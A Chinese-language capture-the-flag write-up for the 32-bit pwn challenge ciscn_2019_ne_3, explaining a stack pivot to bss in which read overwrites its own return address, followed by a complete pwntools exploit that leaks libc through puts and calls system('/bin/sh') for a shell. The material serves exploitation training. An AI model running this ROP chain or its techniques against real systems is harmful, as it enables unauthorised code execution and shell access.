本文主要是介绍ciscn_2019_ne_3,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
ciscn_2019_ne_3
(在rop长度过小情况下,通过read劫持read自身的返回来达到后续大量rop)
首先检查一下程序的保护机制
然后,我们用IDA分析一下,32位栈溢出,难点在于结束变更了两次esp,因此,我们单纯的溢出,直接会造成esp变更到一个无效的地址处。
因此,我们需要将将ecx覆盖为bss段,将栈切换到bss上进行rop。但是切换到bss之前,需要先在bss段布置好rop才行。由此,程序一开始处,叫我们输入长度时,能够输入16字节,并且数据保存在bss段,16字节,前4字节,我们用来存储长度值-1,然后,我们可以布置下3条rop gadget。
3条gadgets,单纯的read调用完成不了,我们可以ret2text,调用text里的read。
至于读取数据到哪里,这是关键,我们要利用read来劫持read自己的返回地址。这样,read结束后就不会返回到text后面执行,而是进入劫持后的流。
payload = '-1\n\x00' + p32(text_read) + p32(bss) + p32(0x100)sh.sendafter('length of password:',payload)#栈迁移到bss上payload = 'a'*0x48 + p32(bss + 8)sh.sendlineafter(':',payload)
如图,我们利用read,向read函数自身的返回地址输入数据,这样就可以劫持read返回到后续输入的rop里。后续rop里,我们要继续做一个栈迁移,因为要调用puts等函数,需要开辟较大的栈空间,因此,我们需要将栈向后迁移0x600。
#coding:utf8
from pwn import *sh = process('./ciscn_2019_ne_3')
#sh = remote('node3.buuoj.cn',25625)
elf = ELF('./ciscn_2019_ne_3')
libc = ELF('/lib32/libc-2.27.so')
read_plt = elf.plt['read']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_ebp = 0x0804881b
pop_3 = 0x08048819
leave_ret = 0x08048575
bss = 0x0804A060
text_read = 0x080486D0
sh.sendlineafter(':','haivk')#通过劫持read的返回的地址,来达到进一步的利用
payload = '-1\n\x00' + p32(text_read) + p32(bss) + p32(0x100)sh.sendafter('length of password:',payload)
#栈迁移到bss上
payload = 'a'*0x48 + p32(bss + 8)
#raw_input()
sh.sendlineafter(':',payload)
#raw_input()
rop = p32(pop_ebp) + p32(bss + 0x600 - 4) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(bss + 0x600) + p32(0x100)
sh.sendafter('well, please contiune\n',rop)
#调用puts后,继续调用read输入后续rop
rop2 = p32(puts_plt) + p32(pop_ebp) + p32(puts_got) + p32(read_plt) + p32(pop_3) + p32(0) + p32(bss + 0x600 + 0x20) + p32(0x100)
sleep(0.5)
#raw_input()
sh.send(rop2)
puts_addr = u32(sh.recv(4))
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.search('/bin/sh').next()
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
print 'binsh_addr=',hex(binsh_addr)
rop3 = p32(system_addr) + p32(0) + p32(binsh_addr)
sh.send(rop3)sh.interactive()
这篇关于ciscn_2019_ne_3的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
![BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin](https://i-blog.csdnimg.cn/direct/ed45c0efd0ac40c68b2c1bc7b6d90ebc.png)
![最简单的使用JDBC[连接数据库] mysql 2019年3月18日](https://i-blog.csdnimg.cn/blog_migrate/d10b0c37d5115bce2197b87d8034b833.png)
![(php伪随机数生成)[GWCTF 2019]枯燥的抽奖](https://i-blog.csdnimg.cn/direct/4cedb561c99944399713d7d7d7a37c7c.png)
